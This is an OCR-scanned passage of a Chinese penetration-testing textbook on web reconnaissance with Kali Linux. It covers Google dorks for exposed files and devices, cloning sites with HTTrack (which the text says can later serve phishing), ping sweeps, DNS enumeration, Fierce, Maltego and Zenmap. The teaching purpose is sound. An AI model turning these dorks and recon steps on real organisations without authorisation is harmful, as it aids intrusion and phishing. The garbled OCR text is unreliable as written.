iron.org 9062653822 


© Copyright 2009 Cisco Systems, Inc. All rights reserved. 


这 里 我 们 列 出 一 些 示 例 搜 索 查 询 命 令 : 


O 找 出 机 密 文档 : intext: classified top secret; 
O 找 出 Linksys 监 控 摄 像 头 的 管理 网 形 界 面 ( 注 意 ， 你 可 能 并 不 喜欢 找到 的 结果 ): 
inurl:main.cgi; 


OQ 找 出 Nessus 报 告 来 找到 易 被 攻击 的 系统 : inurl :NESSUSXXXXXXXX, 


要 了 解 有 关 Google Hacking 的 更 多 细节 ， 可 以 参考 一 本 非常 棱 的 书 一 一 由 Johnny Long # B 
Google Hacking for Penetration Testers， 也 可 以 访问 作者 位 于 http://johnny.ihackstuff.com 的 个 人 
网 站 。 


2.2.11 Google Hacking 数 据 库 


H Hackers For Charity ( http:/www.hackersforcharity.org ) 的 Johnny Long 创 建 的 Google Hacking 
数据 库 ( GHDB )， 是 谷歌 搜索 查询 的 权威 参考 。 对 用 户 名 、 密 码 、 吻 受 攻击 系统 和 漏洞 利用 的 
搜索 都 会 被 Google Hacking 狂 热 分 子 抓 取 并 归 类 。 那 些 将 这 类 谷歌 搜索 进行 归 类 的 狂热 分 子 通 入 
称 为 谷歌 怪 咖 ( Google Dork” )。 


(D 此 处 的 定义 跟 Johnny Long 在 GHDB 中 的 定义 不 符 。 GHDB 中 Google Dork 是 指 那些 不 小 心 被 谷歌 暴露 在 黑客 搜索 查 
询 下 的 系统 所 有 者 。 参 见 http:/www.exploit-db.com/google-dorks/。 一 一 译 者 注 
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要 访问 GHDB， 请 打开 http:/www.exploit-db.com/google-dorks/。 你 能 在 Web 页 面 上 看 到 列 出 
的 最 新 GHDB 搜 索 ， 可 以 点 击 任 何 搜索 查询 来 查看 搜索 结 


^0 0.94 
A "A, A EN y. = si - 2; 


— 


ACKING-DATA2 ASE 


We call them 'googledorks': Inept or foolish people as revealed by Google. Whatever you call these 
fools, you've found the center of the Google Hacking Universe! 


Category: Free text search: xy 


Title 


你 可 以 在 该 web 页 面 的 底部 找到 不 同类 别 的 搜索 。 在 下 面 的 例子 中 ， 我 们 会 切 到 分 类 
Vulnerable Files 并 选择 查询 ionCube Loader Wizard. 


6's. € B= 
nw LL NP UL NP A A F a 


ACKING-DATA2 ASE 


We call them 'googledorks': Inept or foolish people as revealed by Google. Whatever you call these 
fools, you've found the center of the Google Hacking Universe! 


Category: Free text search: i (77773 


Google search: 


Hits: 5280 
Submited: 2011-05-28 
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我 们 可 以 点 击 搜索 查询 ， 它 会 跳 到 谷歌 的 搜索 绪 采 页 面 。 


Google inurl:loader-wizard ext:php 


Web Images Maps Shopping More ~ Search tools 


ionCube Loader Wizard 
gsship.org/GSSC/ICONCubeilnstall/.../loader-wizard.php?timeout... + 

Loader is at: /home4/gsshipor/public html/ioncube/ioncube loader lin 5.2.so. Loader 
OS code: lin. Loader architecture: x86. Loader word size: 32. Loader PHP ... 


ionCube Loader Wizard 

tecnologias101 .info/algesweb/ioncube/loader-wizard.php ~ 

Please contact the script provider if you do experience any problems running encoded 
files. For security reasons we advise that you remove this Wizard script ... 


ionCube Loader Wizard - Next Best Thing To Mom 


www.nextbestthingtomom.net/loader-wizard.php ~ 
ionCube Loader Wizard. GoDaddy Installation Instructions. It appears that you are 
hosted with GoDaddy (www.godaddy.com). If that is not the case then please ... 


ionCube Loader Wizard 

www.municanete.gob.pe/loader-wizard.php ~ 

ionCube Loader Wizard. To use files that have been protected by the ionCube PHP 
Encoder, a component called the ionCube Loader must be installed. 


ionCube Loader Wizard 
planetgore.com/ioncube/loader-wizard.php?page-default ~ 

ionCube Loader Wizard. An updated version of this Wizard script is available here. The 
ionCube Loader version 4.0.4 is already installed and encoded files ... 


前 面 的 例子 显示 谷歌 找到 了 一 些 结果 。 很 明显 ionCube Loader 没 有 经 过 配置 或 是 没有 被 正确 
配置 。ionCube Loader 实 际 上 是 一 球 很 棒 的 软件 ， 它 会 保护 那些 用 PHP 开 发 的 软件 ， 使 其 不 能 在 
非 授 权 计 算 机 上 浏览 或 是 修改 。 不 过 , 在 这 个 例 了 于 中 , 管理 员 没 有 做 任何 配置 ， 而 是 直接 留 下 了 
默认 的 配置 癌 导 。 


Professional PHP Solutions 


ionCube” 


ionCube Loader Wizard 


To use files that have been protected by the ionCube PHP Encoder, a component called the ionCube Loader must be installed. 


This Wizard wil! give you information on how to install the ionCube Loader. 


Please select the type of web server that you have and then click Next. 


Shared (for example, server with FTP access only and no access to php.ini) 
Dedicated or VPS (server with full root ssh access) 
Local install 


Next 
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点 击 第 一 条 链接 时 ， 我 们 会 跳 到 配置 该 软件 的 主 界面 。 


GHDB 主 要 的 作用 是 将 谷歌 变 成 渗透 测试 人 员 的 一 个 受 限 的 Web 应 用 扫描 带 。 在 上 面 这 个 例 
子 中 ， 用 来 加 固 安全 的 “善意 ”的 软件 现在 却 可 能 被 攻击 者 用 来 对 付 Web 服 务 体 。 


2.2.12 ”研究 网 络 


许多 人 并 不 理解 在 实施 攻击 之 前 研究 目标 网 络 的 真正 目的 .业余 的 渗透 测试 人 员 都 知 掉 在 进 
行 渗透 测试 之 前 需要 选 定 一 个 目标 。 毕 竟 ,， 渗透 测试 人 员 需 要 找到 他 们 各 种 兵 奏 的 用 武之 地 。 许 
多 业余 人 员 会 通过 使 用 Nmap、 进 行 ping 扫 射 (ping sweep) 或 使 用 其 他 比较 骏 露 的 工具 来 判断 哪 
些 目标 可 以 导致 目标 环境 中 断 服 务 ， 但 往往 最 终结 末 并 不 佳 。 

网 络 侦察 主要 是 选 定 目标 。 老 到 的 安全 专业 人 士 会 告诉 你 , 好 的 侦察 是 为 了 选 定 质 量 比较 局 
的 目标 。 他 们 大 部 分 时 间 都 是 在 观察 ， 而 不 是 行动 。 每 个 渗透 测试 的 第 一 步 午 是 精确 地 找到 和 选 
定局 质量 的 目标 。 


站 在 客户 的 角度 上 ,渗透 测试 人 员 可 能 会 碰 到 这 样 的 情况 : 有 的 人 因 阻 止 

M 了 渗透 测试 人 员 而 洋洋 自得 ， 以 为 这 证 明 他 们 对 得 起 自己 的 薪水 ， 并 且 已 经 对 
网 络 攻击 做 了 充分 的 准备 。 我 们 强烈 建议 在 执行 渗透 测试 时 ,渗透 测试 专业 人 
员 不 要 跟 客 户 的 员工 起 争执 。 在 整个 渗透 过 程 中 ,渗透 测试 人 员 应 侧重 于 安全 


> 


意识 和 揭露 出 存在 的 漏洞 ， 同 时 应 尽 可 能 少 地 跟 目 标的 员工 交流 。 


接 下 来 要 介绍 的 都 是 Kali 中 包含 的 进行 Web 应 用 侦察 时 最 常见 的 工具 。 虽 然 Kali 中 也 有 其 他 
工具 可 用 于 Web 应 用 或 不 同 的 目标 类 型 ， 但 本 章 的 重心 是 使 谈 者 可 以 开始 对 基于 Web 应 用 的 目标 
进行 测试 。 


1. HTTrack: 克隆 网 站 工具 


HTTrack 是 Kali 中 内 置 的 工具 ， 主 要 用 于 克隆 网 站 。 渗 透 测 试 人 员 可 以 利用 它 来 在 可 以 目 主 
控制 的 环境 中 查看 该 网 站 的 完整 内 容 : 所 有 页 面 和 离线 文件 。 此 外 , 我 们 会 在 后 面 的 章节 中 使 用 
HTTrack 来 进行 社会 工程 攻击 。 我 们 可 以 利用 该 网 站 的 副本 来 开发 假冒 的 钓鱼 网 站 ， 这 部 分 我 们 
会 在 介绍 其 他 渗透 测试 工具 集 时 介绍 。 


要 使 用 HTTrack， 打 开 一 个 终端 窗口 , 键入 apt-get install httrack， 如 下 图 所 示 。 


| Kali 的 有 些 版 本 中 没有 内 置 此 工具 。 | 


:~# apt-get install httrack 
Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
httrack is already the newest version. 
The following packages were automatically installed and are no lonc 


er required: 
greenbone-security-assistant libksba8 lLibmicrohttpd10 
Libopenvas6 openvas-administrator openvas-cli openvas-manager 
openvas-scanner xsltproc 

Use ‘apt-get autoremove' to remove them. 

0 upgraded, © newly installed, © to remove and 2 not upgraded. 


这 里 你 要 创建 一 个 目录 来 存储 复制 的 网 站 。 下面 的 截图 显示 的 是 使 用 mkdir 命 令 来 创建 一 个 
名 为 mywebsites 的 目录 。 


:-& mkdir mywebsites 


要 启动 HTTrack， 在 命令 窗口 中 输入 httrack， 然 后 输入 该 项 目的 名 字 ， 如 下 图 所 示 ; 


'~# mkdir mywebsites 
'=# cd / websites 
: /# httrack 


Welcome to HTTrack Website Copier (Offline Browser) 3.46+Libhtsjé 
$0.2 

Copyright (C) Xavier Roche and other contributors 

To see the option list, enter a blank line or try httrack --help 


Enter project name : 国 


下 一 步 是 选择 一 个 存储 网 站 的 目录 。 下 图 中 的 例子 显示 的 是 将 前 面 步 又 中 创建 的 /root/ 
mywebsites 用 作 此 用 途 : 


‘jj# httrack 


Welcome to HTTrack Website Copier (Offline Browser) 3. 
,$0.2 

Copyright (C) Xavier Roche and other contributors 

To see the option list, enter a blank line or try httr 


Enter project name :drchaos.com 


Base path (return=/root/websites/) :/root/mywebsitesli 


输入 你 要 抓 取 的 网 站 的 URL。 下 面 截图 中 的 例子 中 用 的 是 www.drchaos.com。 这 里 可 以 使 用 
任何 网 站 。 许多 攻击 选 定 的 都 是 目标 客户 访问 的 网 站 ,比如 流行 的 社交 媒体 网 站 或 是 目标 的 内 部 
网 站 。 


后 面 两 个 选项 决定 如 何 处 理 抓 取 的 网 站 。 选 项 2 是 最 简单 的 方法 ， 它 会 通过 问 导 来 镜像 该 网 


wi, AH RAYA Tn : 


Base path (returnz/root/websites/) 


Enter URLs (separated by commas or blank spaces) 


Action: 
(enter) 
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:/root/mywebsites 


Mirror Web)Site(s)) 


Mirror Web Site(s) with Wizard 

Just Get Files Indicated 

Mirror ALL Links in URLs (Multiple Mirror) 
Test Links In URLs (Bookmark Test) 

Quit 


下 一 步 , 你 可 以 指定 是 否 在 实施 攻击 时 使 用 代理 。 tun Ag 定 要 下 载 的 文件 类 
图 中 都 用 * 来 指 代 所 有 文件 ) 你 还 可 以 定义 要 设置 的 任何 命令 1 


例子 中 没有 用 任何 其 他 选项 。 


在 httrack 运 行 之 前 , 它 会 先 显 示 要 运行 的 命 


可 以 记 下 这 


EET. 


:www.drchaos.com 


Mirror Web Site(s) 

Mirror Web Site(s) with Wizard 

Just Get Files Indicated 

Mirror ALL links in URLs (Multiple Mirror) 
Test Links In URLs (Bookmark Test) 

Quit 


Proxy (return=none) 


You can define wildcards, like: 


-*.gif +wew.*.com/*.zip -*] 


Wildcards (returnznone) :* 


You can define additional options, such as recurse level (- 
separed by blank spaces 

To see the option list, typea/ help 

Additional options (return=none) 


---> Wizard command Line: httrack www.drchaos.com -W -0 "/r 
bsites/drchaos.com"  -*€v * 


Ready to launch the mirror? (Y/n) :ff 


* www.drchaos. 


* www.drchaos. 


www. drechaos. 


ac 


www. drchaos 
www.drchaos 


www. drchaos 


www. drchaos 


www. drchaos 
www. drchaos 


.com/tag/continuous -monitoring/www. facebook 
.com/tag/Tedtech/www. facebook. com/aamirLakh 
com/tag/ise/www. facebook. com/aamirlakhanid 
.com/tag/infosec/www. facebook. com/aamirlakh 


www.drchaos. 


www.drchaos. 1 
1.gravatar.com/avatar/fbbf2cf55ed16f7707a9e5d8db1c657b 
ps3sAs2Fs2F1.gravatar.coms2Favatars2Fad516503alled5ca435 
www.drchaos. 
.com/category/travel/www.facebook.com/aamir 
www.drchaos. 
www.drechaos. 
.com/tag/travel/www. facebook. com/aamirlakha 
.com/tag/data-breach/www. facebook.com/aamir 


com/tag/compLiance/www. facebook. com/aamirl 
90/860: www.drchaos.com/tag/continuous-monitoring/ (3421 


com/wp- content/uploads/2013/06/identity an 
com/tag/continuous- monitoring/<a href= (33 


www.drchaos.com/benefits-of-using-1dentity-and-access- 


com/author/tim-adams/www. facebook. com/aami 


com/wp-content/uploads/2013/06/ir_plan-190 


com/wp-content/uploads/2013/07/Travel -90x6 
com/wp-content/uploads/2013/07/dsc 0067-30 


AY (PB TATA aX 


行 选项 或 标志 。 下 面 堆 图 中 显示 的 


令 , 如 果 你 以 后 想 直 接 运 行 httrack 而 不 用 问 导 ， 
个 命令 。 下 面 两 个 截图 显示 的 是 使 用 httrack 克 隆 www.drchaos.com 的 过 程 : 
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完成 元 隆 网 站 后 , 切换 到 保存 该 克隆 的 那个 目录 。 在 那里 , 你 能 看 到 该 网 站 所 有 的 文件 和 网 
页 ， 如 下 面 的 截图 所 示 : 


:~# cd mywebsites/ 
:~/mywebsites# ls 


cLloudcentrics. com 
:~/mywebsites# 


现在 一 切 就 绪 , 你 可 以 开始 研究 目标 的 网 站 ,而且 还 可 以 构建 定制 的 渗透 工具 , 利用 漏洞 来 
攻取 用 户 对 那个 元 隆 网 站 的 访问 。 


2. ICMP 侦 察 技 术 


ping 和 traceroute 命 令 是 查找 目标 基本 信息 的 两 个 很 有 用 的 工具 。 当 信息 在 网 络 中 流动 
时 ,， 它 通常 不 是 下 接 从 源 地 址 发 到 目标 地 址 。 通常, 在 到 达 目 标 地 址 之 前 ， 它 需要 在 数 个 系统 间 
穿行 ， 如 路 由 器 、 防 火 墙 和 其 他 计算 机 系统 。traceroute 命 邻 会 找 出 数据 经 过 的 每 个 系统 ， 以 
及 数据 在 系统 间 流 动 时 消耗 的 时 间 。 这 个 工具 在 每 个 现代 操作 系统 中 几乎 都 有 。 对 那些 最 重要 的 
目标 来 说 , ping 和 traceroute 命 令 很 多 情况 下 都 是 禁用 的 , 而 过 多 地 使 用 这 些 服务 可 能 会 触发 
网 络 安全 系统 中 的 营 报 。 许 多 防火 墙 或 其 他 系统 都 被 设 置 成 不 啊 应 B24RYE 路 由 的 。 如 来 系统 能 
响应 traceroute， 那 么 过 度 使 用 该 命令 会 触发 安全 事件 。 如 采 你 的 目标 是 偷偷 潜入 目标 系统 ， 
那么 你 已 经 失败 了 。 有 了 这 些 安全 事件 ， 你 的 目标 肯定 会 安放 和 部 署 针 对 你 的 渗透 测试 的 防御 
措施 。 


ICMP 扫 射 只 是 简单 地 发 送 一 个 echo 请 求 ， 然 后 等 竺 应 答 。 如 果 应 答 返 回 了 ,那么 作为 活 透 
测试 人 员 ， 你 应 该 知道 它 可 能 就 是 目标 。ICMP 扫 描 的 问题 在 于 很 多 防火 增 通 帝 会 拦截 ICMP。 也 
就 是 说 ， 外 面 过 来 的 发 往 目 标 内 网 的 所 有 扫描 都 会 被 ICMP 扫 描 需 拦截 。 

ping 命 令 是 进行 ICMP 扫 射 最 基本 的 方式 。 你 可 以 简单 地 键入 ping， 后 跟 一 个 主机 名 或 了 
地 址 来 查看 针对 ICMP 的 echo 请 求 啊 应 的 是 什么 。 下 面 的 截图 显示 的 是 www.google.com 针 对 
ping 的 结果 : 


Last login: Tue Sep 18 16:28:12 on console 
rtp-jomuniz-8815:^ jomuniz$ ping www.googe.com 

PING www.googe.com (72.44,93.94): 56 data bytes 

64 bytes from 72.44.93.94: icmp seq-8 ttl-45 time=123.566 
64 bytes from 72.44.93.94: icmp, seq-1 ttl-45 time-110.351 
64 bytes from 72.44.93.94: icmp seq-2 ttl-45 time-106,718 
64 bytes from 72.44.93.94: icmp seq-3 ttl-45 time-116,498 


64 bytes from 72.44.93.94: icmp seq-4 ttl-45 time-116,.566 
SD 


--- www.googe.com ping statistics 一 一 一 

5 packets transmitted, 5 packets received, 0.0% packet loss 
round-trip min/avg/max/stddev = 106.218/114.638/123,566/5,.,935 ms 
rtp-jomuniz-8815:~ jomuniz$ 
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如 果 收 到 了 目标 的 回应 , 那么 你 就 能 知道 目标 主机 处 于 活动 状态 。 如 有 果 你 得 到 的 是 超时 , 那 
么 要 么 是 你 的 ICMP 请 求 被 拦截 了 ， 要 么 是 没有 目标 主机 收 到 你 的 请 求 。 

ping 命 令 的 问题 在 于 它 只 人 允许 你 一 次 使 用 ICMP 检 查 一 台 主 机 。fping 命 令 会 允许 你 用 一 条 
命令 ping 多 人 台 主 机 。 它 还 允许 你 读 取 一 个 写 有 多 个 主机 名 或 耻 地 址 的 文件 ， 然 后 对 这 些 主机 发 送 
ICMP 的 scho 请 求 数据 包 。 


要 使 用 fping 命 令 来 在 网 络 上 运行 ICMP 扫 射 ， 调 用 如 下 命令 : 


fping -asg network/host bits 
fping -asg 10.0.1.0/24 


a 标记 用 于 限定 只 返回 活路 主机 的 IP 地 址 ，s 标 记 用 于 显示 该 扫描 相关 的 统计 信息 ，g 标 记 用 
于 将 fping 设 成 安静 模式 ， 即 它 不 会 显示 每 个 扫描 的 状态 ， 而 只 在 完成 时 显示 汇总 信息 。 


| Nmap 的 结果 跟 fping 命 令 很 相似 。 | 


3. DNS 侦察 技术 


许多 重要 的 目标 都 有 一 个 跟 应 用 关联 的 DNS 名 称 。 DNS 名 称 可 以 帮助 用 户 更 方便 地 访问 特定 
服务 ， 从 而 使 他 们 的 系统 看 起 来 更 专业 。 举 个 例子 ， 如 采 要 访问 谷歌 查找 信息 ,你 可 以 打开 一 个 
De ae 在 其 中 输入 74 .125.227.1013Xwww . google.com. 


特定 目标 的 DNS 信 息 对 渗透 测试 人 员 来 说 极其 有 用 ,DNS 允许 渗透 测试 人 员 勾 勒 出 系统 和 子 
域 的 部 壮 框 岁 。 早 期 的 DNS 攻 击 会 从 授权 DNS 服 务 保 上 传送 一 个 区 域 文件 (Zone File), AE 
透 测 试 人 员 就 可 以 查看 完整 的 区 域 文 件 内 容 来 找 出 可 能 的 目标 。 AEM, 今天 大 多 数 DNS 服 务 
售 邵 不 人 允许 非 授 权 的 区 域 文件 传送 。 不 过 ， 这 也 没什么 影响 ! DNS 的 特性 决定 了 它 会 啊 应 查询 ， 
因此 , 攻击 者 可 以 使 用 包含 数 百 个 名 字 的 单词 列表 来 向 DNS 服务 带 进行 查询 。 这 种 攻击 套路 非常 
耗 时 ， 但 许多 方面 和 都 能 日 动 化 。 


Dig ( domain information gropher， 域 名 信息 查询 工具 ) 是 最 流行 、 使 用 最 广泛 的 DNS 调查 工 
具 。 它 会 查询 DNS 服务 右 。 要 使 用 Dig， 打 开 一 个 命令 行 窗口 ， 输 入 aig 和 主机 名 ， 主 机 名 代表 
目标 域名 。 Dig 会 使 用 操作 系统 的 默认 DNS 设置 来 查询 该 主机 名 。 你 也 可 以 给 该 命令 加 一 个 ae<IP> 
参数 来 对 Dig 进 行 配 置 ， 使 其 使 用 特定 DNS 服务 需 来 进行 查询 。 下 面 截 图 中 的 例子 演示 的 是 使 用 
Dig 来 对 www.cloudcentrics.com 进 行 查 询 。 


^* alakhani — bash — 80x24 


chaos:^ alakhani$ 
chaos:^ alakhani$ 
chaos:^ alakhani$ 
chaos:^ alakhani$ dig www.cloudcentrics.com 


; <<>> DiG 9.8.3-P1 <<>> www.cloudcentrics.com 

;; global options: +cmd 

;; Got answer: 

;; —>>HEADER<<- opcode: QUERY, status: NOERROR, id: 57827 

;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0 


;; QUESTION SECTION: 
;www.cloudcentrics.com. IN 


;; ANSWER SECTION: 
www.Cloudcentrics.com. 14400 IN CNAME cloudcentrics.com. 
cloudcentrics.com. 14400 IN A 50.116.97.205 


;; Query time: 24 msec 

;; SERVER: 10.0.1.1#53(10.0.1.1) 
;; WHEN: Tue Mar 19 23:54:02 2013 
;; MSG SIZE rcvd: 69 


chaos:~ alakhani$ D 


Dig PAY - cie tae SES DNS K BUE Fe a IRS (authoritative name server ) TE F 
面 的 截图 中 我 们 输入 的 是 dig -t ns cloudcentrics.com: 


e600 D alakhani — bash — 80x24 


Last login: Tue Mar 19 23:50:26 on ttys000 
chaos:^ alakhani$ dig -t ns cloudcentrics.com 


; <<>> DiG 9.8.3-P1 <<>> -t ns cloudcentrics.com 

;; global options: +cmd 

;; Got answer: 

;; —>>HEADER<<- opcode: QUERY, status: NOERROR, id: 15672 

;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0 


;; QUESTION SECTION: 
; cloudcentrics.com. IN NS 


;; ANSWER SECTION: 
cloudcentrics.com. 85749 IN ns3681.hostgator.com. 
cloudcentrics.com. 85749 IN ns3682.hostgator.com. 


;; Query time: 5 msec 

;; SERVER: 10.0.1.1#53(10.0.1.1) 
;; WHEN: Wed Mar 20 00:04:53 2013 
;; MSG SIZE rcvd: 87 


chaos:~ alakhani$ 


结 末 显示 ， 对 于 域名 www.cloudcentrics.com , 3X 11] VI f LAL DNS AR si. DaN 
ns368 | .hostgator.com#llns3682.hostgator.com. 


AS! 你 刚刚 已 经 找到 了 目标 DNS 的 授权 DNS 服务 需 ! 
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4. DNS 目标 识别 


现在 你 已 经 发 现 了 某 个 域 的 授权 DNS 服务 融 , 你 可 能 想 看 看 在 那个 域 上 都 有 哪些 记录 。 举 个 
例子 , 域 drchaos.com 会 有 几 台 主机 , 比如 cloud.drchaos.com , mail.drchaos.com , sharepoint.drchaos.com. 
这 些 主机 可 能 托管 着 我 们 要 找 的 应 用 ， 或 是 潜在 的 重要 目标 。 


在 开始 随机 选取 主机 之 前 , 我 们 应 该 查询 DNS 服务 硕 来 查看 已 有 哪些 记录 。 最 好 的 方式 就 是 
让 DNS 服务 天 来 告诉 我 们 。 如 东 DNS 服 务 硕 的 配置 文 持 区 域 传 送 ( Zone Transfer ), 它 就 能 给 我 们 


一 份 完整 的 记录 。 


Kali 目 惠 了 一 个 名 为 Fierce 的 工具 。Fierece 会 检查 DNS 服务 融 是 否 人 允许 区 域 传 送 。 如 有 末 人 允许 ， 
Fierce 就 会 进行 区 域 传送 并 通知 用 户 。 如 果 不 人 允许，Fierce 可 以 配置 成 用 骏 力 法 来 从 DNS 服 务 禹 枚 
举 主 机 名 。Fierce 的 设计 初衷 就 是 侦察 工具 ， 这 样 有 了 了 IP 地址， 你 就 可 以 使 用 那些 需要 用 到 IP 地 
址 的 工具 了 ， 比 如 Nmap。 


要 使 用 Fierce， 你 可 以 点 击 Information Gathering > DNS Analysis > Fierce。Fierce 会 加 载 到 
一 个 终 疹 窗 口中 ， 如 下 面 的 截图 所 示 。 


-threads Specify how many threads to use while scanning (d 

is single threaded). 

-traverse Specify a number of IPs above and below wha 
have found to look for nearby IPs. Default is 5 ab 
below. Traverse will not move into other C blocks. 

-version Output, the version number. 


-wide Scan, the,entire ‘class /CG after finding any m 
hostnames in that class C. This generates a lot mo 
but can uncover a lot more information. 

-wordlist Use a seperate wordlist (one word per line) 


perl fierce.pl -dns examplecompany.com -wordlist dictionary 
:-# E 


输入 如 下 命令 运行 Fierce 脚 本 : 
fierce.pl -dns thesecurityblogger.com 


:=# fierce -dns thesecurityblogger.com 
DNS Servers for thesecurityblogger.com: 
ns3.dreamhost .com 
nsl.dreamhost.com 


nsz. dreamhost.com 


Trying zone transfer first... 
lasting ns3.dreamhost.com 
Request timed out or transfer not allowed. 
Testing nsl.dreamhost.com 


Request timed out or transfer not allowed. 
Testing ns2.dréeamhost .com 
Request timed out or transfer not allowed. 


Unsuccessful in zone transfer (it, was) worth) a shot] 
Okay, trying the good old fashioned way... Brute) farce 
Can't open hosts.txt or thé-default wordlist 
Exiting... 

Dd 
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在 前 面 截 图 中 的 域名 thesecurityblogger.com 跟 几 个 主机 关联 。 我 们 已 经 完成 了 任务 。 不 过 ， 
你 能 看 到 Fierce 在 完成 区 域 传送 时 失败 了 。 如 果 你 指定 了 字典 的 话 ，Fierce 会 尝试 暴 力 枚 举 区 域 传 
送 。 我 们 没有 定义 字典 ， 因 为 本 节 的 目的 是 决定 该 域 中 都 有 哪些 主机 ， 而 不 是 在 这 个 时 间 点 进行 
区 域 传 送 攻击 。 不 过 ， 如 采 你 的 目标 不 只 是 定位 Web 应 用 ， 你 可 以 目 行 去 了 解 相 关内 容 。 


现在 我 们 可 以 瞄准 特定 的 主机 , 用 类 似 Nmap 这 样 的 工具 来 仔细 测试 我 们 的 目标 。 使 用 Fierce 
一 个 重要 的 原因 是 选 定 目标 时 只 用 很 少 的 网 络 流量 , 这 样 的 好 处 是 避免 被 发 现 。 我 们 将 会 在 本 章 
后 面 用 Nmap 来 收集 更 多 有 关 目 标的 信息 。 

5. Maltego: 信息 收集 图 表 


Maltego 是 Kali 内 置 的 一 个 由 Paterva 开 发 的 侦查 工具 。 它 可 用 于 多 种 用 途 , 收集 互联 网 上 开放 
的 或 公共 的 信息 。 它 提供 了 一 些 DNS 侦 察 功 能 , 但 更 擅长 提取 目标 指纹 和 收集 目标 上 的 情报 。 它 
会 将 这 些 信息 以 网 表 的 形式 展现 出 来 ， 方 便 分 析 。 


要 启动 Maltego, 可 以 点 击 Kali 中 的 Application 亲 单 ， 然后 点 击 Kali 泥 单 ， 之 后 选择 Information 
Gathering > DNS Analysis > Maltego. 


启动 Maltego 后 第 一 步 是 注册 ， 不 注册 就 无 法 使 用 该 应 用 。 


* Welcome to Maltego! 
Steps Startup wizard - Login (2 of 5) 


Welcome Enter your details below to log in to the Maltego Community Server 
7. Login 
3. Login resul 
Select translorm seeds 
3 Update ta ms Login 
d h i” 


Or it you have not done so yet, register here 


* Email Address | 


Password | 


noríh 
SEES. 


* Solve captcha | 


完成 注册 后 ， 就 可 以 安装 Maltego 并 开始 使 用 To 
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x Welcome to Maltego! 


Steps Startup wizard - Update transforms (5 of 5) 


1. Welcome 
Login Ready...Set...GO! 
Login result 
Select trafisform seeds Your new Maltego client has been initialized sucessfully! 
. UpdateAramsforms 
f > S 


3 new application server(s) were found 
141 new transforms were found 


76 new entities were installed 


You are now ready to use Maltego! 
® Run a machine (NEW!!) 
Open a blank graph and let me play around 
| Open an example graph 


Go away, | have done this before! 


Maltego 有 很 多 方法 可 用 来 收集 信息 。 使 用 Maltego 的 最 佳 方式 是 利用 启动 向 导 ， 选 择 你 要 收 
集 的 信息 类 型 。 有 经 验 的 用 户 可 能 想 直 接 以 空 日 图 标的 形式 直接 局 动 ， 或 是 路 过 整个 癌 导 。 
Maltego 的 强大 之 处 在 于 它 允 许 你 以 可 视 化 的 方式 来 观察 域名 、 组 织 和 人 之 间 的 关系 。 你 可 以 通 
过 DNS 查询 着 重头 注 茶 个 特定 组 织 ， 或 是 查看 茶 个 组 织 以 及 与 其 相关 的 合作 伙伴 。 


根据 选择 的 扫 摘 选项 ，Maltego 人 允许 你 执行 如 下 任务 : 
Q 将 电邮 地 址 跟 人 关联 起 来 ; 
口 将 网 站 跟 人 关联 起 来 ; 


Q 验证 邮件 地 址 ; 
O 从 Twitter 上 收集 信息 ， 包 括 照片 中 的 地 理 位 置信 息 。 


Maltego 的 大 多 数 功 能 都 很 直观， 不 需要 太 多 解释 。 在 功能 描述 部 分 也 有 如 何 使 用 的 信息 。 
Maltego 负 用 来 收集 信息 ， 有 时 用 作 社 会 工程 攻击 的 第 一 步 。 


x Start a Machine 


Steps Run Machine - Choose machine (1 of 2) 


1. Choose machine 


Please select the machine to run from the list below 
2. Specify target 


Company Stalker 
Footprint L1 
Footprint L2 
Footprint L3 


Person - Email Address 


v| Show on startup 


v| Show on empty graph click 
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2.2.13 Nmap 


Nmaph E LEMAS (Network Mapper )， 主 要 用 来 扫描 网 络 中 的 主机 和 服务 。Nmap 
有 一 些 高 级 功能 ， 比 如 检测 系统 上 运行 的 不 同 应 用 及 服务 ， 此 外 还 有 提取 OS 指纹 的 功能 。 它 是 
最 广泛 使 用 的 网 络 扫描 需 之 一 , 这 使 得 它 非常 高 效 , 但 也 很 容易 被 检测 到 。 我 们 建议 尽 可 能 少 使 
用 Nmap， 以 避免 触发 日 标的 防御 系统 。 

要 了 解 如 何 使 用 Nmap 的 更 多 信息 ， 可 以 参考 http:/nmap.org/。 

此 外 ，Kali 自 带 的 是 Zenmap。Zenmap 相 当 于 给 Nmap 加 了 一 层 运 行 命令 的 图 形 化 用 户 界面 
(GUI )。 尽 管 有 些 纯粹 主义 者 会 说 Nmap 的 命令 行 版 本 才 是 最 好 的 版 本 ， 因 为 速度 快 、 使 用 目 由 ， 
但 Zenmap 也 提供 了 一 些 Nmap 中 没有 提供 的 特有 功能 ， 比 如 生成 之 后 可 用 于 其 他 报告 系统 中 扫描 
结果 的 图 形 化 展示 。 


要 打开 Zenmap #!|Backtracks¢ 4, ji Information Mapping > DNS Analysis， 然 后 运行 


Zenmap。 


Scan Tools Profile Help 


Target | » | Profile [intense scan »| Scan| i | 


[nmap -T4 -Ñ -v 


| Host Services | Nmap Output | Ports i Hosts | Topology | Host Details | Scans | 
Os | Host - | | e 


Filter Hosts 


你 会 发 现在 Profile 采 单 中 有 奋 十 可 以 决定 扫描 类 型 的 选项 ， 如 下 面 的 截图 所 示 : 


IIntense scan | 


Intense scan 

Intense scan plus UDP 
Intense scan, all TCP ports 
Intense scan, no ping 

Ping scan 

Quick scan 

Quick scan plus 


Quick traceroute 


Regular scan 


Slow comprehensive scan 
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第 一 步 我 们 先 创建 一 个 新 的 配置 。Zenmap 中 的 配置 允许 渗透 人 员 指 定 要 进行 什么 类 型 的 扫 
摘 ， 包 含 什 么 样 的 选项 。 找 到 Profile 菜 单 ， 选 择 New Profile or Command 来 创建 一 个 新 的 配置 , 
如 下 面 的 截图 所 示 。 


Zenmap 


Scan Tools | | Help 


Target: [| Profile: |Intense sca 


— . Edit Selected Profile Ctrl+E 
Command: [nmap -T4 -A -v 


; | | 
Hosts | Services Nmap Output Ports/ Hosts Topology Host Details Scans 


OS Host i 


选择 New Profile or Command;Z/ri , RRA T BCR. fua ete EDT TV TER 
名 字 。 举 个 例子 ， 可 以 将 配置 称 作 My First Scan 或 是 其 他 任何 你 喜欢 的 名 字 。 


也 可 以 选择 给 该 配置 加 个 描述 。 在 使 用 Zenmap 的 过 程 中 ， 你 可 能 会 创建 许多 配置 ， 进 行 多 
